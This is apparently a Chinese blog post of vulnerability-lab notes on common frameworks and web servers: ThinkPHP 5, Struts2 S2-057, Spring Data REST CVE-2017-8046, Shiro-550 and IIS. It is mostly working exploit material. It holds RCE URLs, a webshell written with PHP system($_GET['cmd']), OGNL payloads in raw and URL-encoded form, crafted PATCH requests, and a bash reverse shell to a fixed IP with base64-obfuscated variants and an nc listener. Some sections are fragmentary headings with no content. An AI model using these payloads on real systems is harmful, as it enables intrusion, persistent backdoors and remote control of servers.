常见框架漏洞

于 2024-08-07 22:35:07 发布
阅读量459 收藏 8
点赞数 17
分类专栏: 常见框架漏洞 文章标签: 常见框架漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lhdbk______/article/details/141002954
版权

thingphpv5

/index.php

漏洞利用

漏洞根本源于 thinkphp/library/think/Request.php 中method方法可以进行变量覆盖,通过覆盖类的核心属性filter导致rce,其攻击点较为多,有些还具有限制条件,另外由于种种部分原因,在利用上会出现一些问题。

远程命令执行

POC:

?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

getshell:

POC:

phpinfo&vars[1][]=-1

POC:

system&vars[1][]=echo "<?php phpinfo();?>" >>1.php

根目录生成1.php 文件,输出phpinfo

被转义加/

system&vars[1][]=echo%20"<?php @system(\$_GET['cmd']);?>" >>2.php

工具:

struts2

S2-057远程执行代码漏洞

/struts2-showcase

在url处输入/struts2-showcase/${(123+123)}/actionChain1.action

后刷新可以看到中间数字位置相加了。

whoami:

${

(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#ct=#request['struts.valueStack'].context).(#cr=#ct['com.opensymphony.xwork2.ActionContext.container']).(#ou=#cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ou.getExcludedPackageNames().clear()).(#ou.getExcludedClasses().clear()).(#ct.setMemberAccess(#dm)).(#a=@java.lang.Runtime@getRuntime().exec('id')).(@org.apache.commons.io.IOUtils@toString(#a.getInputStream()))}

url编码后

/struts2-showcase/%24%7b%20%28%23%64%6d%3d%40%6f%67%6e%6c%2e%4f%67%6e%6c%43%6f%6e%74%65%78%74%40%44%45%46%41%55%4c%54%5f%4d%45%4d%42%45%52%5f%41%43%43%45%53%53%29%2e%28%23%63%74%3d%23%72%65%71%75%65%73%74%5b%27%73%74%72%75%74%73%2e%76%61%6c%75%65%53%74%61%63%6b%27%5d%2e%63%6f%6e%74%65%78%74%29%2e%28%23%63%72%3d%23%63%74%5b%27%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%41%63%74%69%6f%6e%43%6f%6e%74%65%78%74%2e%63%6f%6e%74%61%69%6e%65%72%27%5d%29%2e%28%23%6f%75%3d%23%63%72%2e%67%65%74%49%6e%73%74%61%6e%63%65%28%40%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%6f%67%6e%6c%2e%4f%67%6e%6c%55%74%69%6c%40%63%6c%61%73%73%29%29%2e%28%23%6f%75%2e%67%65%74%45%78%63%6c%75%64%65%64%50%61%63%6b%61%67%65%4e%61%6d%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%6f%75%2e%67%65%74%45%78%63%6c%75%64%65%64%43%6c%61%73%73%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%63%74%2e%73%65%74%4d%65%6d%62%65%72%41%63%63%65%73%73%28%23%64%6d%29%29%2e%28%23%61%3d%40%6a%61%76%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%40%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%27%69%64%27%29%29%2e%28%40%6f%72%67%2e%61%70%61%63%68%65%2e%63%6f%6d%6d%6f%6e%73%2e%69%6f%2e%49%4f%55%74%69%6c%73%40%74%6f%53%74%72%69%6e%67%28%23%61%2e%67%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29%29%29%7d/actionChain1.action

spring

Spring Data Rest 远程命令执行命令(CVE-2017-8046)
漏洞利用

访问http://your-ip:8080/customers/1,然后抓取数据包,使用PATCH请求来修改

PATCH /customers/1 HTTP/1.1

Host: localhost:8080

Accept-Encoding: gzip, deflate

Accept: */*

Accept-Language: en

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)

Connection: close

Content-Type: application/json-patch+json

Content-Length: 202

[{ "op": "replace", "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,115}))/lastname", "value": "vulhub" }]

修改数据:

[{ "op": "replace", "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,115}))/lastname", "value": "vulhub" }]

其中new byte[]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,115}表示的命令touch /tmp/success

反弹shell

bash -i >& /dev/tcp/172.16.0.154/7777 0>&1

YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTYuMC4xNTQvNzc3NyAwPiYx

bash -c {echo,YGJhc2ggLWkgPiYgL2Rldi90Y3AvMTcyLjE2LjAuMTU0Lzc3NzcgMD4mMWA=}|{base64,-d}|{bash,-i}

bash -c {echo,YGJhc2ggLWkgPiYgL2Rldi90Y3AvMTcyLjE2LjAuMTU0Lzc3NzcgMD4mMWA=}|{base64,-d}|{bash,-i}

98 97 115 104 32 45 99 32 123 101 99 104 111 44 89 71 74 104 99 50 103 103 76 87 107 103 80 105 89 103 76 50 82 108 100 105 57 48 89 51 65 118 77 84 99 121 76 106 69 50 76 106 65 117 77 84 85 48 76 122 99 51 78 122 99 103 77 68 52 109 77 87 65 61 125 124 123 98 97 115 101 54 52 44 45 100 125 124 123 98 97 115 104 44 45 105 125

[{ "op": "replace", "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTYuMC4xNTQvNzc3NyAwPiYx))/lastname", "value": "vulhub" }]

10.10.10.10上开启监听:nc -lvp 7777

Spring代码执行(CVE-2018-1273)

访问靶场地址:http://IP:8080/users

抓包添加poc

状态码500

反弹shell

下载命令

指定文件运行

shiro

Shiro rememberMe反序列化漏洞(Shiro-550)
漏洞原理

Apache Shiro框架提供了记住密码的功能(RememberMe),用户登录成功后会生成经过加密并编码的cookie。在服务端对rememberMe的cookie值,先base64解码然后AES解密再反序列化,就导致了反序列化RCE漏洞。

请输入代码块名称

响应包中存在字段set-Cookie:rememberMe=deleteMe

/shiro/CVE-2016-4437

验证Shiro框架

使用BurpSuite进行抓包,在请求包中的cookie字段中添加rememberMe=123;,看响应包header中是否返回rememberMe=deleteMe值,若有,则证明该系统使用了Shiro框架:

利用工具

爆破密钥-检测利用连

使用内存马,哥斯拉连接

中间件

IIS6x

PUT漏洞

漏洞描述

I1S Server 在 Web 服务扩展中开启了 WebDAV,配置了可以写入的权限,造成任意文件上传。

漏洞复现

webdav开启:

默认网站-属性-读取写入

权限-来宾账户-完全控制

用burpsuite 提交OPTIONS 查看支持的协议

put

MOVE

写进去:

IIS短文件漏洞

漏洞描述

Windows 以 8.3 格式生成与 MS-DOS 兼容的(短)文件名,以允许基于 MS-DOS 或 16 位Windows的程序访问这些文件。在cmd下输入"dir /x"即可看到短文件名的效果。

当后缀小于4时,短文件名产生需要文件(夹)名前缀字符长度大于等于9位。

当后缀大于等于4时,文件名前缀字符长度即使为1,也会产生短文件名,

404存在403不存在恰好相反

IIS RCE-CVE-2017-7269

kali开启监听:

python2 加shell 2003ip 80 kail 端口

IIS7x
HTTPSYS远程代码执行(MS15-034)MS-->Microsoft2015-034

利用工具:

lhdbk______
关注
  • 17
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
java框架漏洞_Spring 框架漏洞集合
weixin_42514750的博客
02-25 5503
虽说是Spring框架漏洞,但以下包含并不仅Spring Framework,Spring Boot,还有Spring Cloud,Spring Data,Spring Security等。CVE-2010-1622 Spring Framework class.classLoader类远程代码执行影响版本:SpringSource Spring Framework 3.0.0 - 3.0.2、S...
web中间件常见漏洞总结.pdf
12-14
以下是对这些常见漏洞的详细总结: 1. **SQL注入**:当Web应用未能正确过滤或转义用户输入的数据时,攻击者可以插入恶意SQL语句,从而获取敏感信息、篡改数据甚至完全控制数据库。 2. **跨站脚本(XSS)**:XSS...
常见框架漏洞
m0_46467017的博客
08-20 8004
Shiro默认使用了CookieRememberMeManager, 其处理cookie的流程是: 得到rememberMe的cookie值–>Base64解码–>AES解密–>反序列化.然而AES的密钥是硬编码的, 密钥泄漏的根本原因是开发人员在开发过程中部分代码直接使用了网上的一些开源的项目代码,就导致了攻击者可以构造恶意数据造成反序列化的RCE漏洞。cookie的key为RemeberMe,cookie的值是经过对相关信息进⾏序列化,然后使⽤aes加密,最后在使⽤base64编码处理形成的。
JAVA常用框架漏洞
小小猪的博客
08-13 3696
三大语言常用框架漏洞 Java框架 1.MyBatis 是支持定制化 SQL、存储过程以及高级映射的优秀的持久层框架,其主要就完成2件事情: 封装JDBC操作 利用反射打通Java类与SQL语句之间的相互转换 MyBatis的主要设计目的就是让我们对执行SQL语句时对输入输出的数据管理更加方便,所以方便地写出SQL和方便地获取SQL的执行结果才是MyBatis的核心竞争力。 ...
PHP常用框架漏洞
小小猪的博客
08-14 2949
PHP常用框架漏洞 PHP框架 laraval介绍: Laravel基于MVC架构,可以满足诸如事件处理、用户身份验证等各种需求,同时通过包管理实现模块化和可扩展的代码,并且对数据库管理有着健壮的支持。 漏洞: 1. Laravel 配置文件泄露 2. Laravel <= 8.4.2 存在远程代码执行漏洞 3. Laravel 存在SQL注入漏洞 4. Laravel 反序列化漏洞 CakePHP 介绍: ...
Spring框架漏洞合集
小小猪的博客
08-18 7896
Spring框架漏洞合集 Spring Security OAuth2 远程命令执行漏洞(CVE-2016-4977) 访问路径/oauth/authorize,会看到左上角有个绿色叶子的标志,一般都是spring或者springboot 直接打poc,可以看到有el表达式注入的形式 /oauth/authorize?response_type=${2*3}&client_id=acme&scope=openid&redirect_uri=http://test 如果要
常见漏洞利用框架整理
Python_0011的博客
12-31 1124
内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
常见的web中间件&java框架漏洞&总结
bobo_milk的博客
05-21 1171
对近期的web中间件漏洞进行了解。因此我对常见的web中间件漏洞进行了收集以及整理。(本篇文章将持续更新) 文章目录 一、IIS 二、Apache 三、Nginx 四、Tomcat 一、IIS IIS6.x 解析漏洞 原理:服务器默认不解析; 号及其后面的内容,相当于截断 *.asp;.jpg的文件会当成asp文件执行;/*.asp文件夹下的文件也会被当作asp脚本执行 另外,IIS6.x除了会将扩展名为....
Hibernate及JSF框架漏洞
小小猪的博客
08-18 1288
Hibernate框架漏洞 Hibernate框架中的HQL注入漏洞 Hibernate是一种ORMapping框架,内部可以使用原生SQL还有HQL语言进行SQL操作。 所谓的HQL注入,就是指在Hibernate中没有对数据进行有效的验证导致恶意数据进入应用程序中造成的。 请看这段代码: Input参数即可造成注入。 不过在Hibernate中,一般都是在createQuery中使用PDO,使用setString填充占位符进行sql语句的拼接,如果是这样的话,自然就不存在SQL注入.
Spring框架漏洞
weixin_68408599的博客
12-11 1381
以下框架漏洞均为Spring的框架,讲解方式为漏洞产生原因以及漏洞复现,重点是漏洞复现的具体过程。
常见漏洞利用exphub
01-23
Exphub是一个汇聚了多种常见Web安全漏洞利用代码的开源项目,主要面向网络安全研究者、渗透测试人员以及安全教育从业者。这个项目的目的是提供一个学习和实践的平台,帮助用户了解和掌握不同类型的Web应用程序漏洞的...
常见网站漏洞及其防御
05-17
- **定期更新**:保持网站及其所有组件(如插件、框架)的最新状态,及时修补已知的安全漏洞。 - **安全扫描**:定期使用专业的安全工具对网站进行全面扫描,查找潜在的安全漏洞。 - **防火墙和入侵检测系统**:部署...
程序员常见的WEB安全漏洞2022优秀文档.pptx
11-14
程序员常见的WEB安全漏洞2022优秀文档 在这个优秀的文档中,我们将讨论程序员常见的Web安全漏洞,包括SQL注入攻击和跨站脚本攻击(XSS)。这两个漏洞都是非常常见的Web安全漏洞,对于程序员来说非常重要。 SQL注入...
NFine快速开发框架
04-23
4. **通用后台管理系统**:NFine框架提供了常见的后台管理功能,如权限管理、菜单管理、角色管理等,这些模块化的设计让开发者可以快速搭建一套完整的后台系统,同时支持自定义扩展,满足不同项目的需求。...
typechov漏洞.zip
08-10
“typechov漏洞.zip”这个标题提到了一个特定的安全漏洞,即Typecho框架中的一个名为“typechov”的漏洞。Typecho是一个流行的开源博客平台,由PHP编写。"漏洞"一词表明这是一个关于软件安全问题的文章,而“zip”则...
常见WEB漏洞整理-CSRF
06-11
适合由于初学者进行框架了解,和大师傅们进行回顾
openapi自定义验证框架
07-20
- 提升安全性能:验证框架可以帮助检测潜在的安全漏洞,如SQL注入、跨站脚本等。 - 提升用户体验:通过及时反馈错误信息,用户可以更快地修正问题,提升API的易用性。 - 简化文档:自定义验证规则可以直接体现在...
PHP常见安全漏洞攻防研究.pdf
最新发布
01-05
"PHP常见安全漏洞攻防研究" PHP 是一种广泛使用的服务器端脚本语言,拥有强大功能和灵活的语法,使得 Web 开发者能够快速开发包含动态页面的 Web 应用程序。然而,由于 PHP 对开发人员要求很低和开发人员的疏忽,...
常见框架以及框架漏洞
10-17
常见的Web框架有Spring、Django、Flask等,这些框架都有其特点和优缺点。在使用这些框架时,需要注意一些常见漏洞,比如SQL注入、XSS攻击、CSRF攻击等。 其中,SQL注入是指攻击者通过在输入框中输入恶意的SQL语句,从而获取或篡改数据库中的数据。XSS攻击是指攻击者通过在网页中注入恶意脚本,从而获取用户的敏感信息或者进行其他恶意操作。CSRF攻击是指攻击者通过伪造用户的请求,从而进行一些非法操作。 为了防止这些漏洞,我们可以采取一些措施,比如使用参数化查询来防止SQL注入,使用输入验证和输出编码来防止XSS攻击,使用CSRF Token来防止CSRF攻击等。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值